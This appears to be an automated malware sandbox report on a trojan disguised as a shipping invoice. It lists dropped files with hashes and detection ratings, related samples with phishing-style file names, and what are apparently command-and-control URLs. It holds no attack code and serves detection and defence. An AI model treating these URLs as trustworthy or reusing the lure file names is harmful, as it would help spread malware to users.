Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@9/27@11/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 69.3% (good quality ratio 63.9%)
• Quality average: 72.3%
• Quality standard deviation: 31.2%
HCA Information:
• Successful, ratio: 82%
• Number of executed functions: 100
• Number of non-executed functions: 120
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.255.188.83, 104.43.193.48, 51.104.139.180, 20.54.26.129, 52.155.217.156, 8.241.121.254, 8.248.117.254, 67.26.83.254, 67.26.73.254, 67.26.81.254
• Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
• Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time | Type | Description
15:07:26 | API Interceptor | 20x Sleep call for process: cmd.exe modified

Joe Sandbox View / Context

IPs
                                                                            Payment - Swift Copy.exeGet hashmaliciousBrowse
                                                                            • www.meetyourwish.com/mnc/?Mdkdxdax=WY4KUSY8ftRWBzX7AqE30jxuDiwNulyYTSspkj6O426HLT41/FrvTZzWmkvAdUuy3I6l&ZVj0=YN6tXn0HZ8X
                                                                            Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                                                            • www.kanmra.com/bg8v/?DXIXO=bN+sZwdqksHEVUXNrgv1qWKxxuRS+qOVBUFqNGSJvK31ERFsrbT8+Ywa/qntJ641tecm&Jt7=XPv4nH2h
                                                                            SR7UzD8vSg.exeGet hashmaliciousBrowse
                                                                            • www.seatoskyphotos.com/g65/?7nwhJ4l=TXJeSLolb01vansOrhIgOMhNYUnQdj/rfF4amJcBrUYE+yYYkSMe6xNPoYCNXAECPfCM&PpJ=2dGHUZtH1RcT9x
                                                                            fSBya4AvVj.exeGet hashmaliciousBrowse
                                                                            • www.crdtchef.com/coz3/?uVg8S=yVCTVPM0BpPlbRn&Cb=6KJmJcklo30WnY6vewxcXLig2KFmxMKN3/pat9BWRdDInxGr1qf1MmoT0+9/86rmVbJja+uPDg==
                                                                            7OKYiP6gHy.exeGet hashmaliciousBrowse
                                                                            • www.space-ghost.com/mz59/?DxlpdH=bx7WlvEZr3O5XBwInsT/p4C3h10gePk/QJkiFTbVYZMx/qNyufU701Fr8sAaS9DQf7SJ&k2Jxtb=fDHHbT_hY
                                                                            ptFIhqUe89.exeGet hashmaliciousBrowse
                                                                            • www.pethgroup.com/mfg6/?EZxHcv=idCXUjVPw&X2MdRr9H=wzYKSVB1uOMgKV/VusaTzgW2Vk9zJFgyOb/xhrytwZGUm/QkEM0ws9cSepgeCyUWcTuH
                                                                            G1K3UzwJBx.exeGet hashmaliciousBrowse
                                                                            • www.softdevteams.com/wsu/?JfBpEB4H=UDFlvLrb363Z/K3+q9OjWueixmKoOm8xQw3Yd3ofqrJMoI6bXqsuqW1H0uReyIz+CvJE&odqddr=RzuhPD
                                                                            ARRIVAL NOTICE.xlsxGet hashmaliciousBrowse
                                                                            • www.befitptstudio.com/ogg/?oN9xX=4mwbOnk+WEse1PEPUI+9OE7CuRKrYpR8Uy9t/eBM2SPWQ9N1Pm1uQBQ852Ah+FLlD8dO/Q==&r8=-ZoxsbmheH5H_0_

Domains

No context

ASN


JA3 Fingerprints

No context

Dropped Files


Created / dropped Files

C:\Users\user\AppData\Local\Temp\3\phplive\12.opends60.dll
Process: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
File Type: data
Category: dropped
Size (bytes): 53
Entropy (8bit): 4.239357190608839
Encrypted: false
SSDEEP: 3:p/uBEp/EiOmB4EAOM1F:RcAk2KHP
MD5: DAA2B2B53C73519E2CFE5239A33D7FE2
SHA1: 4CDC35F6B76191DFB8045FFA68994AD7D470491A
SHA-256: 079BBC83AE9ECB7D781BD24EEDBAEEE2B58009906739990C97A0976AB9332E81
SHA-512: 2130E15A5686EE1788C29C2022922C128257EB7C45313B49DD2946A23C9D9A78B7CB0AD3C700B2C3FFDD9225B5D9A020DE9B4A01114D771C4A850507F72E950C
Malicious: false
Reputation: moderate, very likely benign file
Preview: ......L....9!...D..._srv_ansi_paramdata.opends60.dll.

C:\Users\user\AppData\Local\Temp\3\phplive\66.opends60.dll
Process: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
File Type: data
Category: dropped
Size (bytes): 42
Entropy (8bit): 4.034709089239382
Encrypted: false
SSDEEP: 3:p/uBJzETOM1F:RcGHP
MD5: 3F2A75E68F8D67494B386DFAA5ABE2B3
SHA1: F405E0BC8B4FC2CAD111045C67E3C64343E2C7CA
SHA-256: E7AB6B06A1134F3EFE20FC5816AD5402C8E111FBD5031EC4F2C520224B9D5BDB
SHA-512: A7909C511287C5A2F59992BD674998D0714F100CEAB30168D9C9F85FC3E6B9BA76D0066C2CEA3FEED9AE2E651605FDD0F3992C849300B9C073F4CB1D05ADA90E
Malicious: false
Reputation: low
Preview: ......L....9........_srv_run.opends60.dll.
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):27648
                                                                                                                                  Entropy (8bit):4.228986376506815
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:o4Fw3juO2A7BJ4a8VtZdGzcoRA3qswV/iYeSWsaeW7+J8d:5FmcaqGwoRA3qswV/ZeB6J
                                                                                                                                  MD5:FE529E3B23EA66C07B43314EF0081B58
                                                                                                                                  SHA1:5CC7F144DCCB312B0DC6BA7AD0CB2456F2FC3C61
                                                                                                                                  SHA-256:C2FA4308C73812360FC3FB01201B0FC9D1C6B53451ED15DF3739088A4C8789D5
                                                                                                                                  SHA-512:8CA88376FB051481C44C51FDF38D90BADEBB255AF2DAC51DDB298AA0F203F1130DAE73D667F1CACCE4E6D80CDC846DBE09FA7A2BB0790E80FF8E584B55E3C6D8
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: zgUsJgf4Tz.exe, Detection: malicious
                                                                                                                                  • Filename: TwptRHhOAE.doc, Detection: malicious
                                                                                                                                  • Filename: yHn715noho.exe, Detection: malicious
                                                                                                                                  • Filename: vxLhI0gpXQ.exe, Detection: malicious
                                                                                                                                  • Filename: Wire TT.exe, Detection: malicious
                                                                                                                                  • Filename: mananyi.exe, Detection: malicious
                                                                                                                                  • Filename: Bukti transfer-07-03-2020.exe, Detection: malicious
                                                                                                                                  • Filename: y7VVT4uCPj.exe, Detection: malicious
                                                                                                                                  • Filename: Bank wire receipt.exe, Detection: malicious
                                                                                                                                  Reputation:low
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):36864
                                                                                                                                  Entropy (8bit):4.076507463551346
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:CZPGn19CO5ESSQhJm9hMKCMI6g6ihJSxUCR1rgCPKabK2t0X5P7DZ+R/WeM2W:CVgRESSSKMBMI6FRJjM
                                                                                                                                  MD5:27280F57DF0638B41F709DAC754330D8
                                                                                                                                  SHA1:B7F3BF2C0BF39E523B7E4C79D7DAFD1E59B84B60
                                                                                                                                  SHA-256:75D22B4B3D7CD995B99CA4EB3EFA782F3BDFF9675BC64CCE409223109FDA6DE7
                                                                                                                                  SHA-512:8444E270D52F17E077D2B3A5B149FCF9029761B6E37411F213A055CB0942BE859EB60547CC4F1411F503EFB50D0D5539C3671F0CF6E2B9C1D9506E07DA21D869
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: #U062f#U0644#U064a#U0644 #U0639#U0644#U0649 #U0627#U0644#U062f#U0641#U0639.exe, Detection: malicious
                                                                                                                                  • Filename: 7Dn18AigNe.exe, Detection: malicious
                                                                                                                                  • Filename: aps.exe, Detection: malicious
                                                                                                                                  • Filename: Wire confirmation_pdf.exe, Detection: malicious
                                                                                                                                  • Filename: DHL_AWB_INV_9882900_99862788_998.exe, Detection: malicious
                                                                                                                                  • Filename: ZjAWsG7aGq.exe, Detection: malicious
                                                                                                                                  Reputation:low
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\competitorsalesliterature.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):5902
                                                                                                                                  Entropy (8bit):4.93869769577694
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:TF+NU24NUNQYtsSztsOBtsWYtso9hj/Y3P:TcU2IUqosSpsGsWose8
                                                                                                                                  MD5:AE2BF9A46C64D68E42ECB985C1D2DE71
                                                                                                                                  SHA1:9697E538D714CDF375EA907738DBFD219A0853FB
                                                                                                                                  SHA-256:0F98148F02B339F99B13587FD33F9796CC2E8DA76FFBB4EB27AF6C3D2CBAC945
                                                                                                                                  SHA-512:AA62BA3EB0BDD2F9DB3FD74000C5D709131DFD48928A93FDF570790F6123C39D3E50BCAAEB2C3C472B5471A241D6ACE93E8DE19CE3D8CAB7EAE1B9C3932D9E9D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview: .<?xml version="1.0" encoding="utf-8"?>..<?xml-stylesheet type='text/xsl' href='entity.xsl'?>..<Entity xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <id>a8e2826b-b430-4c13-8765-d2b009e48f99</id>.. <name>CompetitorSalesLiterature</name>.. <physicalname>CompetitorSalesLiterature</physicalname>.. <logicalname>competitorsalesliterature</logicalname>.. <intersect>true</intersect>.. <security>false</security>.. <lookup>false</lookup>.. <assignment>false</assignment>.. <integrationeventmask>0</integrationeventmask>.. <workfloweventmask>0</workfloweventmask>.. <islogical>false</islogical>.. <Column>.. <id>41607dc6-fea4-4e40-9f7d-f0c2c71d79ee</id>.. <column>1</column>.. <in-code-name>competitorid</in-code-name>.. <logicalname>competitorid</logicalname>.. <physicalname>CompetitorId</physicalname>.. <length-bytes>16</length-bytes>.. <length-chars />.. <nullable>no</nullable>.. <is-pk-column>yes</is-pk
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\flac.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2706
                                                                                                                                  Entropy (8bit):5.179516218922872
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cFfH8vKYndVmmXlTkeH9vI5CduyrmmVp2i45dMg8FaTqye+B0Soqks4cyyRgLRdn:/KYn3mmXl4o1wCduyrmmVp2i4LMg8Fac
                                                                                                                                  MD5:DABA225688B554152EB810A36D5AAA0B
                                                                                                                                  SHA1:B21070F810E2F18F198BB08409CA14EFC9EAEF5C
                                                                                                                                  SHA-256:1806FD102100C6F3748942670CAAB86C19F7564CD69BB96A1FC0B29929230CCF
                                                                                                                                  SHA-512:E3B7834082281B31F9C15E8A2B580AD1ABAC9718C9866454135B8D1A83E62916FF17D5B9FB1CADF2AE80BF6C4DF9F1DDD98D0037A9A923DCBB2D56FB86D6A3BB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="audio/flac">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>FLAC audio</comment>. <comment xml:lang="ar">FLAC ....</comment>. <comment xml:lang="be@latin">A.dyjo FLAC</comment>. <comment xml:lang="bg">..... . FLAC</comment>. <comment xml:lang="ca">.udio FLAC</comment>. <comment xml:lang="cs">zvuk FLAC</comment>. <comment xml:lang="da">FLAC-lyd</comment>. <comment xml:lang="de">FLAC-Audio</comment>. <comment xml:lang="el">.... FLAC</comment>. <comment xml:lang="en_GB">FLAC audio</comment>. <comment xml:lang="eo">FLAC-sondosiero</comment>. <comment xml:lang="es">sonido FLAC</comment>. <comment xml:lang="eu">FLAC audioa</comment>. <comment xml:lang="fi">FLAC-..ni</comment>. <comment xml:lang="fo">FLAC lj..ur</comment>. <comment xml:lang="fr">audio FLAC</comment>. <comment xml:lang="ga">fuaim FLAC</commen
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):39104
                                                                                                                                  Entropy (8bit):6.237597979894025
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:QRi/Yplgp4V5qWNqYoMfTF/K4itMpdRJDh9ODV0L3d/o+X:AKYLHV5ZNbnFy4itMpdD7ODV0R/oK
                                                                                                                                  MD5:58C655527B57D74AE3C189A60A42DA18
                                                                                                                                  SHA1:F267630311A1C42CE9C4F0DEDA00E4132E9F8B25
                                                                                                                                  SHA-256:A2F590DEA50CDE47B0325D7A9ADEEA464257F46B76C059CF3E1AB2DB65574685
                                                                                                                                  SHA-512:03C708A23339792802F506278891005E521B7188D0558FCC0F25DFD0C7CB0048C8FBF1F9FB1AC65FD6EF4BC4C7CAC1715BCD8F07DD82E3E6770E327CC630E209
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: 4IZjnTicql.exe, Detection: malicious
                                                                                                                                  • Filename: vthr97FHLT.rtf, Detection: malicious
                                                                                                                                  • Filename: mses.exe, Detection: malicious
                                                                                                                                  • Filename: Wire slip.exe, Detection: malicious
                                                                                                                                  • Filename: uiWs90xemq.exe, Detection: malicious
                                                                                                                                  • Filename: mMpUmTDiLo.exe, Detection: malicious
                                                                                                                                  • Filename: SO12145970.exe, Detection: malicious
                                                                                                                                  • Filename: order.exe, Detection: malicious
                                                                                                                                  • Filename: Ca5l6Ndopx.exe, Detection: malicious
                                                                                                                                  • Filename: Dhl package - pdf.exe, Detection: malicious
                                                                                                                                  • Filename: BOQ Specification.exe, Detection: malicious
                                                                                                                                  • Filename: Drawings For MOPA.exe, Detection: malicious
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\thermal-cpu-cdev-order.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:exported SGML document, ASCII text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):508
                                                                                                                                  Entropy (8bit):4.640723757143228
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:pvPN+VnvbZdr5vZb1bBZb8bZbTZbqMB1C:tsb/r5vZb1FZbYZbTZbqMB1C
                                                                                                                                  MD5:6BBB6D648BA2C70B9635E843818BEEBB
                                                                                                                                  SHA1:21BF5A1ACF381285EF3FE88D180B3F17D474804C
                                                                                                                                  SHA-256:9E4A02255ACD8A4C10373B6E64454A95E57986C32245A6EDA7B8CF7F57E3D740
                                                                                                                                  SHA-512:000324D55AC800870CC761C260A3DEE1EB4FA363426AE1C525FE72503502D4AA9F51104CFAB657C6F55D137BD3F1DDC5A1A4ACBA8F022468C0C1721AEFCB1A79
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: . .Specifies the order of compensation to cool CPU only..There is a default already implemented in the code, but.this file can be used to change order..The Following cooling device can present.-->..<CoolingDeviceOrder>.. Specify Cooling device order -->..<CoolingDevice>rapl_controller</CoolingDevice>..<CoolingDevice>intel_pstate</CoolingDevice>..<CoolingDevice>intel_powerclamp</CoolingDevice>..<CoolingDevice>cpufreq</CoolingDevice>..<CoolingDevice>Processor</CoolingDevice>.</CoolingDeviceOrder>..
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\vnd.ms-excel.sheet.macroenabled.12.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):7697
                                                                                                                                  Entropy (8bit):5.515382730457339
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:xAYS+gpcZWaIarmt/Omdwgm+Wz+BKUpva8i+NfY+g+uP+p+1dS59F0+9mo0my+Cn:9XxBi0Wxko7OXe8j57T2pgIcB
                                                                                                                                  MD5:5A6CAD444DBF130B22F855A889DBE677
                                                                                                                                  SHA1:8F91D234CBE3AFC1F1993BE8C63A68F756FDFC83
                                                                                                                                  SHA-256:A76702F606092D47669779F8D48F2F701319437223D87EAD41D2FA068522FF87
                                                                                                                                  SHA-512:3D777032EF8CE336E233F43A6FBDC08CFC305FE22A91433A580922A035FD71C819B423D314A888F8875FCCD0E89B3869553A38A9B20A6D078B4BDCF398818E85
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="application/vnd.ms-excel.sheet.macroEnabled.12">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment xml:lang="be@latin">Ra.likovy akru. Excel</comment>. <comment xml:lang="en_GB">Excel spreadsheet</comment>. <comment xml:lang="fo">Excel rokniark</comment>. <comment xml:lang="ia">Folio de calculo Excel</comment>. <comment xml:lang="pt_BR">Planilha do Excel</comment>. <comment xml:lang="sq">Flet. llogaritje Excel</comment>. <comment xml:lang="zh_CN">Excel ....</comment>. <comment xml:lang="zh_TW">Excel ...</comment>. <generic-icon name="x-office-spreadsheet"/>. <glob pattern="*.xlsm"/>. <sub-class-of type="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"/>. <comment>Microsoft Excel Worksheet</comment>. <comment xml:lang="af">Microsoft Excel-werkvel</comment>. <comment xml:lang="am">Microsoft Exce
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3\phplive\x-texinfo.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3100
                                                                                                                                  Entropy (8bit):5.010092205102224
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:nMxJAtLuI0UYJmMcaRb2kV2JjUWBULitlqp8cwngpzQNzxkK3eTHg3GXGSIDMH79:nD0bqFi2I5
                                                                                                                                  MD5:61FFA6F5926C7F2CF819C2A0774D3E21
                                                                                                                                  SHA1:BEC77DA7C7492860DA713F8B87279CB1A3DDCB11
                                                                                                                                  SHA-256:07A5F4DFB449940A7BEA1F100120AE284067F24961457FF5F56C16F556BE4856
                                                                                                                                  SHA-512:3556CAC3A1713FF61D297F9837841DE8DB31CD90AAB848AA2BAE6BF8B1F6BFA4D42AD10324C9BAEA65BE7F08359267952B37B531C8823E4EF859202AD5AB45EB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="text/x-texinfo">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>TeXInfo document</comment>. <comment xml:lang="ar">..... TeXInfo</comment>. <comment xml:lang="ast">Documentu TeXInfo</comment>. <comment xml:lang="az">TeXInfo s.n.di</comment>. <comment xml:lang="be@latin">Dakument TeXInfo</comment>. <comment xml:lang="bg">........ . TeXInfo</comment>. <comment xml:lang="ca">document TeXInfo</comment>. <comment xml:lang="cs">dokument TeXInfo</comment>. <comment xml:lang="cy">Dogfen TeXInfo</comment>. <comment xml:lang="da">TeXInfo-dokument</comment>. <comment xml:lang="de">TeXInfo-Dokument</comment>. <comment xml:lang="el">....... TeXInfo</comment>. <comment xml:lang="en_GB">TeXInfo document</comment>. <comment xml:lang="eo">TeXInfo-dokumento</comment>. <comment xml:lang="es">documento de TeXInfo</comme
                                                                                                                                  C:\Users\user\AppData\Local\Temp\Erodium
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):238433
                                                                                                                                  Entropy (8bit):7.998471610150145
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:6144:BQfR8c9EBhNjuw4YNm8vH128zEoE/qG/ydG5h3aYvDUImzle+wX3:BQxUSw4YNXdJvE/qwakLvDupEH
                                                                                                                                  MD5:980A6B092855D202363B6436E4A854E8
                                                                                                                                  SHA1:AA8E1A7E1AB7832C3112E5C35B7DA143FF919CE0
                                                                                                                                  SHA-256:F617D029F947EBB5C0B7B159233E699F5653A1F92E81F9FE44C60555884DC93C
                                                                                                                                  SHA-512:6DEDF42A718DBC5A4AD25C20561C3ADC0FC629D1135AA68D02FC264363617C827FE7EAA0DD49E828DF93D80852B4E5AA8C932B20D43FF833C02C4B868DF30367
                                                                                                                                  Malicious:false
                                                                                                                                  C:\Users\user\AppData\Local\Temp\Prehnite.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):73728
                                                                                                                                  Entropy (8bit):5.318897902733705
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:TXpmIFZK536QZVz2LHG/jgVUTTkSTC+OWsGMN8ZoVVtAb1zcGtIrdCR:T5nc3hVz26rJNC+OWsGtMtAZzcGtIp0
                                                                                                                                  MD5:F8AA685A3908110E79F4639AA7DADDFA
                                                                                                                                  SHA1:DD4D16172EA4851F757ABD34A8CB3C835552E6A3
                                                                                                                                  SHA-256:AEEA4B86EA607CF9820E3CADD4E98353A57EC789EC0A0E2FEFBDD84ABD25194A
                                                                                                                                  SHA-512:8989A1E5A29043A8CEC9353D8923DC7FCA52988949637133D5AF5F655B04C8016EF8930DA4F57A9C068B8E9208C4B8AE2BDACA9CA699755D139CAB0ED2A3C5A6
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                  C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):39936
                                                                                                                                  Entropy (8bit):5.640913891016309
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:fqKIjHhW0CfW0FKT7vZKP1xG69D1/gEehcaLnTJ/2acSd:3RnfW0eoPPXpCnTJ/2acSd
                                                                                                                                  MD5:ED1C00557CDE869CAA963BBF9C820F05
                                                                                                                                  SHA1:53BBD8B86FCBEE9316E02AF399634522B12539B0
                                                                                                                                  SHA-256:4D50CE341BE70511E9A871DD347B3F5793EA97787CDFC92045C0BCC8AAE6E298
                                                                                                                                  SHA-512:509AFC51B647A6904A3A4ABF04B43DFAEE5FA0878C3A822FCE84DD58CE2AB1C15A38610487C520CA6F7C42ED37D754DF55A82B0A81A28D31493F2535D9568405
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                  C:\Users\user\AppData\Local\Temp\font\init\msg\x-navi-animation.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3225
                                                                                                                                  Entropy (8bit):5.314169702825883
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:1H5/nf2jK/PMQ5B15rPYs7xV01oAZXw5BQDs4XJxjvF1w0ng0nnmDkrZeClbrIMH:ffIil2FI0
                                                                                                                                  MD5:9565C08D6037EEA308B97581F12BE260
                                                                                                                                  SHA1:1954B1CFBF437BD79FDD597C15C25BB01B83F243
                                                                                                                                  SHA-256:1199A3E8F3C8C23C59FEB468A1D1542BA6ABE3C373589DF0277924EAFDB50D57
                                                                                                                                  SHA-512:247762DF5C903AC0F478831A88FB4E0FE3EDF5404FE3D263A443BC035D9741317DF8CDA8284A6409C3D7DB8E89742520E9DCAC4F9E0BB38ED18E24C791D6CA0D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="application/x-navi-animation">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>Windows animated cursor</comment>. <comment xml:lang="ar">.... ...... .......</comment>. <comment xml:lang="be@latin">Animavany kursor Windows</comment>. <comment xml:lang="bg">...... . Windows, ........</comment>. <comment xml:lang="ca">cursor animat de Windows</comment>. <comment xml:lang="cs">animovan. kurzor Windows</comment>. <comment xml:lang="da">Windowsanimeret mark.r</comment>. <comment xml:lang="de">Animierter Windows-Cursor</comment>. <comment xml:lang="el">.......... ....... Windows</comment>. <comment xml:lang="en_GB">Windows animated cursor</comment>. <comment xml:lang="es">cursor animado de Windows</comment>. <comment xml:lang="eu">Windows-eko kurtsore animatua</comment>. <comment xm
                                                                                                                                  C:\Users\user\AppData\Local\Temp\font\init\msg\x-pn-audibleaudio.xml
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):392
                                                                                                                                  Entropy (8bit):4.965076682722952
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:TMHd97KLSjTqy3F4N5542UHZ2DKX2IRKCJSHUBmAyJSHUBmA4AsF:2d97/joqZHZ2i2kKCLBmrLBmpjF
                                                                                                                                  MD5:AD1C969082DE8AA77B382516F5B0FF61
                                                                                                                                  SHA1:A83DC30341A5752A9D0D18770EF257C8C0B3A692
                                                                                                                                  SHA-256:78930E0C87BC468FC5B13A5F971C244D9158C9DE7B1F2C219213E5CA18E60F03
                                                                                                                                  SHA-512:559B71307FF0159089FA194B1C0359B446C23A78F3B44D969BA44B759ACA409BFF0B63F7FF5CA7BDA840583F9C29E13527B36DA45CBEAB6189D15BA9037F473B
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>.<mime-type xmlns="http://www.freedesktop.org/standards/shared-mime-info" type="audio/x-pn-audibleaudio">. Created automatically by update-mime-database. DO NOT EDIT!-->. <comment>Audible.Com audio</comment>. <glob pattern="*.aa"/>. <glob pattern="*.aax"/>. <alias type="audio/vnd.audible"/>. <alias type="audio/vnd.audible.aax"/>.</mime-type>.
                                                                                                                                  C:\Users\user\AppData\Local\Temp\manage\mms\VCProjectEngine.dll
                                                                                                                                  Process:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1078
                                                                                                                                  Entropy (8bit):5.254976539067803
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:2djEk62f7mmhKslkmog89hEmYnLuZ1nLw3LHEaFXu0:cjP7mmh3amorEmYnLinLw3LHEaFXL
                                                                                                                                  MD5:3E2460DF0763A75406D2C92A6CAC864C
                                                                                                                                  SHA1:3CC0933DF52BD4B09767ADA563B58923EF68EBAF
